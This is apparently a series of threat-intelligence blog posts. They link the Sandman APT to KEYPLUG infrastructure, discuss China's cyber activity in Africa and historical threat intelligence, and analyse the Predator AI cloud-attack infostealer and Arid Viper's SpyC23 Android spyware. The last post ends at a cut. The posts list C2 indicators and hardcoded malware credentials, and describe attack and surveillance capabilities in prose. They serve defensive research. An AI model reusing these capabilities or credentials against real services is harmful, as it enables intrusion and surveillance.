The SSL certificate assigned to the LuaDream C2 domain ssl.explorecell[.]com has also been used on the servers with IPs of 185.51.134[.]27 (between March and April 2023) and 45.80.148[.]151 (in March 2023). 185.51.134[.]27 is allocated to the Estonian VPS service provider EstNOC and 45.80.148[.]151 to the Romanian provider HOSTGW SRL. ssl.explorecell[.]com last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

  • Thumbprint: fc8fdf58cd945619cbfede40ba06aada10de9459
  • Serial number: 364670096077097330220756280372394037039639
  • Common Name: ssl.explorecell[.]com

Approximately 4 months later (in August 2023), the server at 185.51.134[.]27 used an SSL certificate issued for the domain dan.det-ploshadka[.]com. This domain last resolved to 79.110.52[.]160, a server hosted by the Romanian service provider M247.

  • Thumbprint: a7932112b7880c95d77bc36c6fcced977f4a5889
  • Serial number: 365025056055127017786055050446086862849019
  • Common Name: dan.det-ploshadka[.]com

Microsoft and PwC have observed dan.det-ploshadka[.]com being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40. This assessment is primarily based on the use of RC4 keys for encrypting C2 data that are unique to STORM-0866/Red Dev 40 as well as used known STORM-0866/Red Dev 40 malware in the intrusions.

The dan.det-ploshadka[.]com certificate has also been used on the servers with IPs 45.90.59[.]17 (between July and September 2023), 45.129.199[.]122 (in September 2023), and 146.70.157[.]20 (in June 2023).

Another certificate, issued for the domain ssl.e-novauto[.]com, was also used on 146.70.157[.]20 in May 2023. ssl.e-novauto[.]com, which has an overlap in subdomain naming convention with the ssl.explorecell[.]com Sandman domain, last resolved to 172.67.216[.]63 (an IP address of a Cloud-based reverse proxy infrastructure). 146.70.157[.]20 is allocated to the Romanian hosting service provider M247.

  • Thumbprint: b6d759c9ea5d2136bacb1b2289a31c33500c8de8
  • Serial number: 59961237898726280462746217792430024401815283068
  • Common Name: ssl.e-novauto[.]com

In common with dan.det-ploshadka[.]com, Microsoft and PwC have observed the  ssl.e-novauto[.]com domain being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40.

Among the other server IPs on which the ssl.e-novauto[.]com certificate was used (5.255.88[.]188 in October 2022; 5.2.67[.]176 between March and May 2023; 5.2.72[.]130 in April 2022; 37.120.140[.]205 between March 2022 and May 2023; and 185.38.142[.]129 between October 2022 and January 2023), 5.2.67[.]176 has been the resolving IP for the ssl.articella[.]com domain since January 2023. This domain has an overlap in naming convention with the ssl.e-novauto[.]com STORM-0866/Red Dev 40 domain and the ssl.explorecell[.]com Sandman domain.

Infrastructure overview
Infrastructure overview

PwC tracks STORM-0866/Red Dev 40 as a distinct cluster from the other threat groups using the KEYPLUG malware based on their frequent use of Cloud-based reverse proxy infrastructure, likely as an operational security measure to avoid exposing the true hosting locations. We observed this in the context of Sandman as well, noting a shift from using a directly exposed C2 server IP address (C2 domain: ssl.explorecell[.]com) to address of a reverse proxy infrastructure (C2 domain: mode.encagil[.]com).

The overlap of unique infrastructure control and management practices, hosting provider selections, and domain naming conventions, indicates a likely relation between the Sandman and the STORM-0866/Red Dev 40 APT clusters from an infrastructure perspective.

LuaDream and KEYPLUG

LuaDream and KEYPLUG are distinct malware strains. KEYPLUG is implemented in C++, whereas the majority of the LuaDream functionalities are implemented in Lua. The samples that we analyzed do not share straightforward indicators that would confidently classify them as closely related or originating from the same source, such as use of identical encryption keys or direct overlaps in implementation. However, we observed indicators of shared development practices and some overlaps in functionalities and design, suggesting shared functional requirements by the operators. This is not uncommon in the Chinese malware landscape.

We also observed a code comment in Chinese in the main_proto_WinHttpServer component of LuaDream version 11.0.2.1.23.1, indicating potential Chinese origin. However, we note that all other LuaDream string artifacts (function and variable names, and code comment, status, and error reporting strings) are formulated in English.

Code comment in LuaDream (translates from Chinese to “returned handle”)
Code comment in LuaDream (translates from Chinese to “returned handle”)

LuaDream is likely still in active development. It remains to be seen whether further iterations of the malware and its plugins will share implementation overlaps, functionality or design patterns with KEYPLUG or other malware strains of suspected Chinese origin.

C2 Protocols

LuaDream and KEYPLUG are highly modular and multi-protocol in design, both implementing support for the HTTP, TCP, WebSocket, and QUIC protocols for C2 communication. The combination of QUIC and WebSocket is a relatively rare backdoor feature and its implementation in both LuaDream and KEYPLUG may be the result of a shared functional requirement by the backdoors’ operators.

The order in which LuaDream and KEYPLUG evaluate the configured protocol among HTTP, TCP, WebSocket, and QUIC is the same: HTTP, TCP, WebSocket, and QUIC in that order. The LuaDream keyword HTTPS2 refers to WebSocket and KEYPLUG implements additional support for UDP. We do not exclude the possibility for future versions of LuaDream to support UDP as well.

LuaDream: Protocol handling
LuaDream: Protocol handling

KEYPLUG: Protocol handling
KEYPLUG: Protocol handling

For each protocol, both LuaDream and KEYPLUG implement internal structures that store client data, such as the handles to the established sockets to the C2 servers.

Execution Flow and C2 Data Management

The high-level execution flows of LuaDream and KEYPLUG are very similar. Both backdoors first gather and exfiltrate system and user information in designated functions, with overlaps in gathered information (for example, MAC address, OS version, IP address, computer name, and username).

LuaDream and KEYPLUG then instantiate threads designated for sending and receiving C2 data, establish connection to the C2 server, and continue to process backdoor commands and manage plugins. Plugin management includes loading and unloading plugins.

The backdoors use global data buffers designated for storing data to be sent to the C2 server, and data received from the server. LuaDream and KEYPLUG read from the global buffers that store incoming C2 data and continue processing it when available.

LuaDream and KEYPLUG store in designated internal structures overlapping information about the global buffers, such as starting memory addresses, sizes, and pointers to Windows CRITICAL_SECTION structures. LuaDream defines this structure as _MEM_DATA_CACHE_.

LuaDream: Global buffer structure (decompiled LuaJIT bytecode)
LuaDream: Global buffer structure (decompiled LuaJIT bytecode)

KEYPLUG: Global buffer structure (IDA-defined structure)
KEYPLUG: Global buffer structure (IDA-defined structure)

LuaDream and KEYPLUG implement designated functions for reading from, and writing to, these buffers. These functions synchronize buffer access by multiple threads using Windows Critical Sections.

LuaDream: Reading C2 data from a global buffer (LuaDream)
LuaDream: Reading C2 data from a global buffer

KEYPLUG: Reading C2 data from a global buffer
KEYPLUG: Reading C2 data from a global buffer

Throughout their execution, both LuaDream and KEYPLUG generate one-time integer values based on the system uptime returned by the GetTickCount function. The backdoors calculate these values by applying modulo and/or addition operations to the system uptime. Some overlapping uses of the generated values are as sleep time intervals or protocol-specific keys, such as the Sec-WebSocket-Key packet header field that is used in the WebSocket opening handshake.

LuaDream: Sleep interval
LuaDream: Sleep interval

KEYPLUG: Sleep interval
KEYPLUG: Sleep interval

Conclusions

We assess that there are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular. This highlights the complex nature of the Chinese threat landscape. Its constituent threat actors will almost certainly continue to cooperate and coordinate, exploring new approaches to upgrade the functionality, flexibility, and stealthiness of their malware. The adoption of the Lua development paradigm is a compelling illustration of this.

Navigating the threat landscape calls for continuous collaboration and information sharing within the threat intelligence research community. SentinelLabs remains committed to this mission and is grateful to our industry partners involved in this collective endeavor.

Indicators of Compromise

Domains

dan.det-ploshadka[.]com KEYPLUG C2 server
mode.encagil[.]com LuaDream C2 server
ssl.articella[.]com Suspected KEYPLUG or LuaDream C2 server
ssl.e-novauto[.]com KEYPLUG C2 server
ssl.explorecell[.]com LuaDream C2 server
yum.luxyries[.]com KEYPLUG C2 server

IP Addresses

146.70.157[.]20 KEYPLUG C2 server (based on known C2 certificates)
172.67.216[.]63 KEYPLUG C2 server
185.38.142[.]129 KEYPLUG C2 server (based on a known C2 certificate)
185.51.134[.]27 LuaDream and KEYPLUG C2 (based on known C2 certificates)
185.82.218[.]230 LuaDream C2 server
37.120.140[.]205 KEYPLUG C2 server (according to a known C2 certificate)
45.129.199[.]122 KEYPLUG C2 server (based on a known C2 certificate)
45.80.148[.]151 LuaDream C2 (based on a known C2 certificate)
45.90.59[.]17 KEYPLUG C2 server (according to a known C2 certificate)
5.2.67[.]176 KEYPLUG C2 server (based on a known C2 certificate)
5.2.72[.]130 KEYPLUG C2 server (based on a known C2 certificate)
5.255.88[.]188 KEYPLUG C2 server (based on a known C2 certificate)
79.110.52[.]160 KEYPLUG C2 server

Certificate Thumbprints

a7932112b7880c95d77bc36c6fcced977f4a5889 KEYPLUG C2
b6d759c9ea5d2136bacb1b2289a31c33500c8de8 KEYPLUG C2
fc8fdf58cd945619cbfede40ba06aada10de9459 LuaDream C2

LABScon Replay | The Cyber Arm of China’s Soft Power: Reshaping a Continent

By: LABScon
6 December 2023 at 13:04

In his keynote at LABScon23, SentinelLabs’ Principal Threat Researcher Tom Hegel addressed a crucial but often overlooked aspect of global cybersecurity: cyber threat activity in less-monitored regions, particularly Africa.

Focusing on China’s strategic use of soft power across the African continent, Hegel provides a compelling analysis of how technology and investments are wielded as tools of influence and control.

Highlighting its significant investments in key sectors, Hegel explores how China has established strategic influence in African telecommunications, finance, and surveillance sectors and the implications this has for cybersecurity.

While noting that such investments are attractive to African countries for their undoubted benefits, the talk raises concerns about the trade offs. In the realm of telecommunications, Chinese firms like Huawei and ZTE can be linked to potential cases of surveillance and control, evidenced by actions like internet clampdowns in Zimbabwe during politically sensitive times. In finance, an intricate web of financial engagements provide worrying opportunities for cyber espionage. Initiatives like the Safe City projects bring technological advancements but at the potential price of civil and political surveillance.

Hegel concludes with a call to action for the cybersecurity community. The importance of collaborative efforts in monitoring and understanding the cyber activities in these regions is essential not only for the direct protection of entities in undermonitored areas but also for a broader understanding of the global cyber threat landscape.

Connecting the dots between regional cybersecurity issues in Africa and their global repercussions, this talk advocates for a more inclusive view of global cyber threats, highlighting the need for a unified and informed response from the cybersecurity community.

Watch below to see the full talk. Read the accompanying research paper for an even deeper dive.

About the Presenter

Tom Hegel is a Principal Threat Researcher with SentinelOne. He comes from a background of detection and analysis of malicious actors, malware, and global events with an application to the cyber domain. His past research has focused on threats impacting individuals and organizations across the world, primarily targeted attackers.

About LABScon

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Decoding the Past, Securing the Future | Enhancing Cyber Defense with Historical Threat Intelligence 

By: Tom Hegel
28 November 2023 at 14:28

Organizational defenders today face unprecedented pressure to keep up with a relentless stream of new attacks. No sooner than the latest campaign is discovered, indicators shared, and defenses bolstered, and we are on to the next one. The details of these attacks are added to our collective historical record, but most defenders rarely have time or motivation to reconsider what further value they might offer.

However, mining historical data for insight into tomorrow’s attacks is, we would argue, an undervalued resource. From expanding our list of known indicators and developing better threat intelligence to improving our understanding of attribution and providing new discoveries, investigating historical data is an asset that cyber defenders can and should make more of.

In this post, we explore practical ways that revisiting past cyber incidents can empower defenders and help to anticipate future threats more effectively.

1. Exploring the Past to Expand Actionable Threat Intelligence

In September of 2023, SentinelLabs observed a new threat activity cluster by a previously unknown threat actor we dubbed Sandman. The threat actor deploys malware utilizing the LuaJIT platform, a development paradigm relatively rarely seen in the cyberespionage domain,  but which has an historical association with suspected Western or Western-aligned advanced threat actors.

Early last year, SentinelLabs released a report on a new cyber threat actor we named ModifiedElephant. This research was the conclusion of an investigation into an unknown offensive threat actor responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence. Our analysis identified that ModifiedElephant has been operating since at least 2012 and continued to operate as of the report.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

So why does this matter? Cyber paleontology allows us to take a small bit of knowledge of targeted intrusions, and expand it into hundreds of indicators of compromise, such as malware samples and unique infrastructure. In the case of ModifiedElephant, we tied the threat actor to hundreds of other intrusion attempts across the globe. This research found activity spread across nearly a decade, targeting individuals and organizations alike.

IOCs have been greatly expanded on, which allow us to improve the defenses of those who were originally targeted, and others who may be targeted in the future. If we simply stopped researching the threat actor based on the initial, smaller, case of a handful of intrusions against individuals, our perception of this actor would remain to be interesting but irrelevant to most. However, visiting a decade back of activity allows us to understand and use actionable intelligence for direct network defense needs.

2. Developing Better Strategic Threat Intelligence

Pushing past directly actionable intelligence such as malware samples, IOCs, and threat detection rules, we can also gain new strategic intelligence on threat actors. Specifically, our perspective of known threat actors can alter greatly when we review past intrusions.

For example, in September we reported and presented at LABScon the topic of China’s soft power agenda throughout Africa. In this research, we shared how Chinese attributed APTs, such as “Backdoor Diplomacy”, have been linked to a previously-reported set of intrusions across South Africa, Kenya, Senegal, and Ethiopia in the past few years.

Revising previously reported infrastructure associated with the threat actor opened our eyes to a wider set of targets in these countries, and a set of targets we have not observed before, including financial organizations. Today, we can use this expanded understanding of the threat actor to apply strategic intelligence for financial organizations and the countries newly observed of interest to the attacker.

Taking a similar approach to others, it would be valuable to dive into high-interest threat actors to question our past assessments and intelligence, aimed at expanding defense capabilities and context today.

3. Enhancing Our Understanding of Attribution

An additional value which can come from a fresh review of historical threat activity concerns attribution – the process of identifying the true attacker behind an activity.

Past intrusions can become clearer based on understanding who the attacking entity actually was, or understanding which threat actor cluster some previously unknown activity may now fall under. For example, in August, we identified malware, with a long history of use by a variety of suspected Chinese clusters, and infrastructure targeting Southeast Asia’s gambling sector related to previous activities attributed to BRONZE STARLIGHT, a Chinese threat actor whose main goal appears to be espionage rather than financial gain.

In addition, we recently reported on the Appin hack-for-hire business in India and how unconfirmed and mysterious activity years back can finally be attributed to them. This includes Operation Hangover, the well known industrial espionage case, and targeting of human rights malware with custom Mac malware.

C2 / Delivery Server bluecreams[.]com and Linked Malware Visualized
C2 / Delivery Server bluecreams[.]com and Linked Malware

Knowing that these sets of activity tie back to a central organization allows renewed understanding and interest in the hack-for-hire threat actor industry. Additionally, and perhaps more importantly, this provides victims with an opportunity to hold attackers responsible for their actions, if desired.

4. Newer Techniques Offer Fresh Insights From Old Data

Using today’s technology to expand past context and knowledge of attackers is also increasingly valuable to modern defenders. The technology sector evolves at a blistering pace, and new research tools often arrive to provide new capabilities.

Although much recent focus has been on adopting and adapting LLMs and generative AI for various infosec tasks, we can also see examples of existing technologies that continue to develop and push the boundaries of what is possible.

One of the best examples of this is YARA— today’s go-to tool for malware description rules used to hunt for various types of files, such as malware or files of high interest. YARA continues to be developed in ways that can yield new discoveries from old datasets. New rule writing methods, combined with major malware repositories such as Stairwell and VirusTotal, can lead to the discovery of leaked attacker files, targeted malware family changes, and uploads of never before seen malware from past attacks.

Combining new discoveries with other tools for tracking infrastructure, like SilentPush, it is possible to make similar high interest discoveries centered around old attacker infrastructure.

Conclusion

As we move forward, it’s important not to lose sight of the past. As many of our research examples highlighted above show, retrospective analyses can wring new actionable intelligence from the raw data of past breaches and help to preempt future attacks.

We encourage other analysts to join us in connecting the dots between what was known, what was overlooked, and what can be learned, taking advantage of the insights that new technologies and methods afford us. Historical data isn’t just an academic record of what went before, but a resource we must mine to craft a more resilient and responsive cybersecurity posture.

Elephant Hunting | Inside an Indian Hack-For-Hire Group

By: Tom Hegel
16 November 2023 at 16:19

Editor’s Note:

SentinelOne has temporarily removed the article “Elephant Hunting | Inside an Indian Hack-For-Hire Group” on Dec 22, 2023 in light of a pending court order and is doing so out of an abundance of caution. SentinelOne stands by its findings and was transparent about the evidence it gathered to support its findings. Those findings were based on many hours of research and verified sources and we are closely following the pending legal action. All rights reserved

Predator AI | ChatGPT-Powered Infostealer Takes Aim at Cloud Platforms

7 November 2023 at 15:13

Executive Summary

  • SentinelLabs has identified a new Python-based infostealer and hacktool called ‘Predator AI’ that is designed to target cloud services.
  • The Predator AI developer implemented a ChatGPT-driven class into the Python script, which is designed to make the tool easier to use and to serve as a single text-driven interface between disparate features.
  • These advancements are not production ready, but demonstrate that actors can realistically use AI to improve their workflows by automating data enrichment and adding context to scanner results.

Background & Distribution

Predator AI is advertised through Telegram channels related to hacking. The main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES. However, Predator is a multi-purpose tool, much like the AlienFox and Legion cloud spamming toolsets. These toolsets share considerable overlap in publicly available code that each repurposes for their brand’s own use, including the use of Androxgh0st and Greenbot modules.

Predator is an actively developed project. In September 2023, a member of the primary Telegram channel inquired about Predator adding a Twilio account checker, to which the developer replied they could deliver in about 2 weeks. In October, the developer posted an update showing the new Twilio checking feature. The version we analyzed has Twilio features, which suggests it is a recent build.

At the top of the script, there is a message from the developer which states that the tool is protected by copyright law. The message also has a disclaimer saying the tool is for educational purposes and the author does not condone any illegal use.

Developer’s message at the top of the Predator script
Developer’s message at the top of the Predator script

Targeting & Technical Details

Predator is a Python application with over 11,000 lines. The application runs entirely through a Tkinter-based graphical user interface (GUI): there is no standalone command line interface (CLI) mode, which distinguishes Predator from many similar tools. The Tkinter approach requires several JSON configuration files.

Predator GUI
Predator GUI

The script has 13 global classes defined, which roughly segment the different features.

Class Name Details
Predator The largest class. Goes from the beginning to line 7079.
Settings Only two lines. Sets UpdatesCheck variable to False and Password to “Predator123”.
Utility Contains calls to Windows commands that get the current window name and to check if the current user is running as an administrator.
PumperSettings Code that inflates the size of a file.
FakeErrorBuilder Creates fake error messages that pertain to XSS testing on a Windows system.
StealerBuilder Builds a configurable infostealer as a Windows Portable Executable (PE).
Translator Translates the dialog boxes and menu items that are rendered in the GUI version of the application via Python library Tkinter. Supported languages are Arabic, English, Japanese, Russian, and Spanish.
NetGun Handles web application security scans with options for proxies and custom wordlists.
CTkMessagebox & CTkListbox Code that renders the graphical user interface (GUI) via Tkinter.
ThemeMaker Custom color schemes for the GUI.
GPTj A ChatGPT-enabled class. Queries the OpenAI API.
NetXplorer Uses Psutil and Subprocesss to query network status and system information.

Predator has features that can be used to attack many popular web services and technologies, including:

Service Provider Details Based In
Aimon SMS marketing Italy
Amazon Web Services (AWS) Simple Email Service (SES) Email platform United States
Aruba Hosting Italy
Clickatell SMS marketing South Africa, United States
ClickSend SMS marketing Australia
Twilio SMS, Voice, Video communications United States
Nexmo Voice & SMS, acquired by Vonage United States
OneSignal SMS, Push Notifications United States, United Kingdom
Openpay Buy Now, Pay Later; ceased operations in February 2023 Australia
PayPal Live environment & Sandbox API keys targeted United States
Plivo Voice & Messaging United States
Razorpay Payment Processor India
Skebby SMS Marketing Italy
Stripe Payment Processor United States
Telnyx Voice, Messaging, Fax United States
Textlocal SMS Marketing United Kingdom
Valueleaf Marketing India
XGATE Marketing & CRM Hong Kong

Predator’s web application attacks look for common weaknesses, misconfigurations or vulnerabilities in Cross Origin Resource Sharing (CORS), exposed Git configuration, PHPUnit Remote Code Execution (RCE), Structured Query Language (SQL), and Cross-Site Scripting (XSS).

The following technologies are targeted:

  • Drupal
  • Joomla
  • Laravel
  • Magento
  • OpenCart
  • osCommerce
  • PrestaShop
  • vBulletin
  • WordPress
Variables that hold output from web service scanning features
Variables that hold output from web service scanning features
Laravel environment parsing
Laravel environment parsing

Predator AI | The GPTj Class

The GPTj class contains the ‘Predator AI’ feature, which is a chat-like text processing interface that connects the user to Predator’s features. The actor designed Predator AI to try to find a local solution first before querying the OpenAI API, which reduces the API consumption.

This class searches the user’s input for strings associated with a known use case centered around one of Predator’s web application and cloud service hacking tools. There are more than 100 cases where Predator handles the data internally or through a free third-party service, such as an IP reputation lookup service. This class contains several partially implemented utilities related to AWS SES and Twilio, as well as utilities to get information about IP addresses and phone numbers.

Predator queries the ChatGPT API only when there is no test case to handle the input. There are several driving functions defined inside this class that handle the activity flow or enable ChatGPT interaction:

generate_text

This function requires two arguments: prompt and api_key. The function uses the OpenAI model text-davinci-003 with a maximum token length of 400 and temperature 0.7. The code makes a POST request to https://api.openai.com/v1/completions and returns the result for handling via the Tkinter UI.

generate_text function in GPTj class
generate_text function in GPTj class

Ai_Backend

This function takes one argument, usrMsg. This code contains the hardcoded OpenAI API key and calls the generate_text function on the usrMsg object with the API Key. The OpenAI server response is returned.

aiRes

This function takes two arguments, msg and patch. This function only calls Ai_Backend–and OpenAI as a result–when the patch argument is equal to 0, or not given. Predator has 106 references to aiRes and each reference has a patch value that should not equal 0. This means the OpenAI functionality is designed to handle edge cases that the script has not natively handled. The function processes whether a patch is present and modifies the UI result based on the length of the response from OpenAI or the patched result.

ChatEvent

This function contains the modular utilities offered by the class. It takes no arguments.

ChatEvent function’s help message highlights the different utilities it offers
ChatEvent function’s help message highlights the different utilities it offers

When the user command is not routed to ChatGPT, several functions handle the request locally or through alternate API calls. We break them down by category.

AWS Features

Though the core utility is present, not all of the following functions are called inside the script, suggesting the developer is still working on these features. This code has significant overlap with AlienFox, Legion, and other earlier iterations of these tools. Based on what is currently in the script, there is no indication that AWS-related data would be sent to the ChatGPT service. Instead, the script parses the input for the presence of aws.c and calls the following functions when present.

If these features were fully implemented, the attacker could use them to perform the following when they have valid AWS account credentials:

  • Check for all email accounts in an AWS SES environment.
  • Check send quotas.
  • Create a new account, assign administrative privileges, and delete the old account.

TwilioChecker

This function queries https://api.twilio.com/2010-04-01/Accounts.json with SID and token as arguments. If "message":"Authenticat" is not in the response, the script parses the response for the fields status, type, and balance. If “status” is not in the response, the script parses the response for balance and currency fields. If status returns as active, the script logs the values of SID, TOKEN,  TYPE,  STATUS,  BALANCE to the file Result/TwilioChecker/result.txt.

GhostTrack

There are several other utilities nested under a function named GhostTrack.

  • IP_Track: Collects information about a given IP address via the ipwho[.]is service.
  • phoneGW: Uses the phonenumbers Python module to format input phone numbers in a standard way and check information about the phone number, such as whether it is a landline or mobile number.
  • TrackLu: Checks one of 23 social media services for a username matching the input argument. The function checks for a 200 status code, which is not effective in the case of private profiles and there are likely many site-specific edge cases.
  • checkIP: Queries api.abuseipdb[.]com to collect information about the given IP address related to abuse metrics, such as an abuse confidence score.

The author included several conditions to handle a user query about the nature of the chat utility, along with a statement that claims the author spent three days developing this feature.

Message inside GPTj class
Message inside GPTj class
A query given through the Predator AI interface and the response from ChatGPT fed into the UI
A query given through the Predator AI interface and the response from ChatGPT fed into the UI

StealerBuilder

This class contains configuration variables to build an infostealer. On October 16 2023, the project developer posted a video about Predator that shows the Stealer build process. A user asked if the resulting executable is fully undetectable, to which the developer replied, “Of course.”

The stealer can be configured to use Discord or Telegram webhooks for C2. The operator can specify an existing executable to insert the infostealer code into. During testing, we were unable to successfully use this feature as the required configuration files were not available. The features visible in the script we analyze indicate that Predator parses files from a Scripts directory and uses those to build either a Windows Portable Executable (PE) file or a Python script version of the stealer module.

StealerBuilder configuration variables
StealerBuilder configuration variables

Conclusion

The discovery of Predator AI is an entirely expected evolution that has previously been undocumented in the hacktool space. Since the recent wave of AI technologies entered the public domain, security professionals have questioned whether this technology was already aiding threat actors and how it could be used to scale actor operations. There were several projects like BlackMamba that ultimately were more hype than the tool could deliver. Predator AI is a small step forward in this space: the actor is actively working on making a tool that can utilize AI.

While Predator AI is likely somewhat functional, this integration does not substantially increase an attacker’s capability. The feature has not yet been advertised on the actor’s Telegram channel, and there are likely many edge cases that make it unstable and potentially expensive.

Like other cloud service attack tools, organizations can reduce the impacts from these tools by keeping web services patched and up to date, as well as keeping internet access restricted to what is necessary. Use cloud security posture management (CSPM) tools to validate that configurations are secure. Consider dedicated logging and detections for anomalous behaviors on cloud service provider (CSP) resources, such as new user accounts being added and deletion of another user account immediately after.

Indicators of Compromise

SHA-1 Hash

88d40f86eefee5112515b73cce2d2badb7f49ffd – main.py Predator Python script

Hardcoded Strings

  • “jSDSgnditikunggobloktolol” – hardcoded AWS account name string
  • “titid” – hardcoded username in AWS GPT functionality
  • “Adminn” – hardcoded username in AWS GPT functionality
  • “Predator123” – hardcoded password from the Settings class
  • “admainkontolpaslodsajijsd21334#1ejeg2shehhe” – hardcoded password for ‘Kontolz’ user account
  • arn:aws:iam::320406895696:user/Kontolz – example ARN for Kontolz user

Arid Viper | APT’s Nest of SpyC23 Malware Continues to Target Android Devices

6 November 2023 at 16:13

Executive Summary

  • Arid Viper is an espionage-motivated cyber threat actor with Hamas-aligned interests. Arid Viper’s toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017.
  • Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped.
  • There are overlaps between recent SpyC23 versions and their 2017 predecessors, tying together several Arid Viper Android malware families.
  • Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israeli-Hamas war. In this context, traditional cyberespionage activities are often enablers for on-the-ground operations and deserve additional scrutiny.

Background

The Arid Viper group has a long history of using mobile malware, including at least four Android spyware families and one short-lived iOS implant, Phenakite. The SpyC23 Android malware family has existed since at least 2019, though shared code between the Arid Viper spyware families dates back to 2017. It was first reported in 2020 by ESET in a campaign where the actor used a third-party app store to distribute weaponized Android packages (APK). That campaign featured several apps designed to mimic Telegram and Android application update managers.

Through 2022 and early 2023, Arid Viper developed several newer SpyC23 versions that share these themes: two apps mimick Telegram, while another is internally called APP-UPGRADE but is based on a romance-themed messaging app called Skipped Messenger. Cisco Talos recently reported on the history of Skipped Messenger, revealing that the once-benign dating application was likely passed from the original developer to the Arid Viper actor.

SentinelLabs compared these newer versions of SpyC23 to the earlier 2020 version, as well as several older Android spyware families associated with Arid Viper: GnatSpy, FrozenCell, and VAMP. Many changes have been made in SpyC23’s development; however, there are notable overlaps with these older families and the taxonomy is less distinct.

App Analysis

The theme of these applications center on messaging and communications. We identified two unique themes: one mimics Telegram, the other mimics an apparent dating-themed app called Skipped Messenger. The group has previously relied on Telegram-themed messengers as well as romance-themed lures and apps.

Arid Viper often relies on social engineering to deliver malware with pretexts that allow operators to engage closer to thier intended victims. The social engineering approach is a boon for delivering Android malware, as there are many hurdles for the actor to overcome before a user successfully installs a malicious app. Working the installation flow into a social engineering pretext is likely more effective than expecting users to install spyware successfully without prompting.

There is a non-weaponized version of Skipped Messenger (SHA-1: 6e1867bd841f4dc16bef21b5a958eec7a6497c4e) that shares the same Firebase service hostname skippedtestinapp[.]firebaseio[.]com as the malicious version. As the Talos report noted, Skipped was originally a legitimate dating app. The Google Play store version was last updated in August 2021.

Skipped Messenger & Telegram app main screen
Skipped Messenger & Telegram app main screen

Like most malicious Android apps, these apps ask the user to enable permissions that facilitate spyware activities.

Skipped Messenger screens prompting the user to enable Accessibility features
Skipped Messenger screens prompting the user to enable Accessibility features

The application permissions give a high degree of control over the device, including:

  • Accessing the phone’s location
  • Making calls without user interaction
  • Monitoring calls made by the user
  • Recording with the microphone, capturing audio output
  • Read & Write to storage
  • Read & Write to the Contacts list
  • Modifying network state
  • Collecting a list of accounts used on the device
  • Downloading files to the phone without user interaction
  • Launching Java archive (JAR) files as a Service
  • Reading notifications received on the device as well as any connected wearables

The developer employed anti-decompilation and anti-virtualization techniques to complicate analysis. Each of these APKs contains application code that is obfuscated. On emulated Android devices, the apps flash and repeatedly cycle through prompts even after the requested permissions have been granted.

Comparing these new versions with older SpyC23 variants, there is significant overlap in package names, which fortifies the relationship between the old and new versions. In the image below, the older version on the left houses malicious activity in the update.bbm package, and the version we discovered on the right houses similar subpackages in the apps.sklite.pacJava package.

Java subpackage names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)
Java subpackage names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

The overlaps continue in the class names. The actor frequently names classes after people’s names, as outlined in the rc_cola/tas_ran_rc_col package structure.

Java class names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)
Java class names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

These applications are quite large, making analysis of each class impractical. Instead, we will focus on several interesting classes and methods.

ACCAPPService

This class handles some communications to the C2. Of note, the class contains code that pertains to the user uninstalling the application. The SendToServerTask subclass logs when the user is in a ‘dangerous’ menu and parses input containing the active menu name for the English words ‘apps’ or ‘applications’ as well as the Arabic word for ‘Applications’.

“User In Dangerous Menu” logging messages
“User In Dangerous Menu” logging messages

Brodie

This class is responsible for much of the app’s upload request handling, acting as an interface between the app and the C2 server. Brodie contains a method named isProbablyArabic, suggesting again that these apps are used against Arabic-speaking targets.

isProbablyArabic method from Brodie class
isProbablyArabic method from Brodie class

CallRecService

This service enables the spyware’s call recording feature. The class is imported from an external library, libcallrecfix.so, and runs as a service. The Unix library is based on at least two open-source Android call recording projects, though neither are actively maintained. This was implemented in 2020 and has been a staple of SpyC23 iterations since. The library is a binary compiled for each of the app’s compatible architectures.

checkRaw

This Audio upload service has many of the same status logging strings and media recording parameters seen in older versions of Arid Viper’s Android toolsets, including FrozenCell, reported by Lookout in 2017, and VAMP, which was reported by Palo Alto in 2017 as well.

RcNewService class from FrozenCell (left) and checkRaw class from 2023 APP-UPGRADE version of SpyC23 (right)
RcNewService class from FrozenCell (left) and checkRaw class from 2023 APP-UPGRADE version of SpyC23 (right)

Some elements of this audio recording code are present in GitHub repositories described as a teardown of the Telegram Android app. While this is potentially an adaptation of open-source software, the similarities between the SpyC23 APKs are consistent, and the external versions do not have the same variables or logging messages.

Moller

This class is notable because it contains code that spans back to much earlier versions of Arid Viper’s Android spyware. We identified a 2017 GnatSpy sample from Trend Micro’s Arid Viper reporting that shares the same upload functionality through a subclass JsDirService.

Panda

This class loads methods from external libraries libRoams.so and lib-uoil.so. The code imports several functions related to manufacturer-specific implementations, including Huawei, Oppo, and Xiaomi.

The Panda class imports methods from the open-source Gotev Android Upload Service, which was also used by the older versions of SpyC23. Panda imports methods from the OKhttp library to craft HTTP requests. When the OnCreate method runs, it initializes the Gotev service, parses the C2 configuration values, and registers GarciaReceiver, a receiver that monitors for a connection state change which was also present in older versions.

onCreate method inside the Panda class
onCreate method inside the Panda class

Like older versions of SpyC23, this class has logic to parse and decode the C2 server details from strings stored inside the lib-uoil.so and related binaries. The strings are encoded partially in Base64 with an additional layer likely on top to parse the correct C2 server URIs. The previous technique of dropping the strings before and after the hyphen remain, and further substitution removes spaces and underscores, replacing them with hyphens.

C2 Infrastructure

The C2 servers used by these apps continue the longstanding Arid Viper domain naming scheme of a hyphenated hostname that uses Western-sounding peoples’ names. The primary C2 servers are:

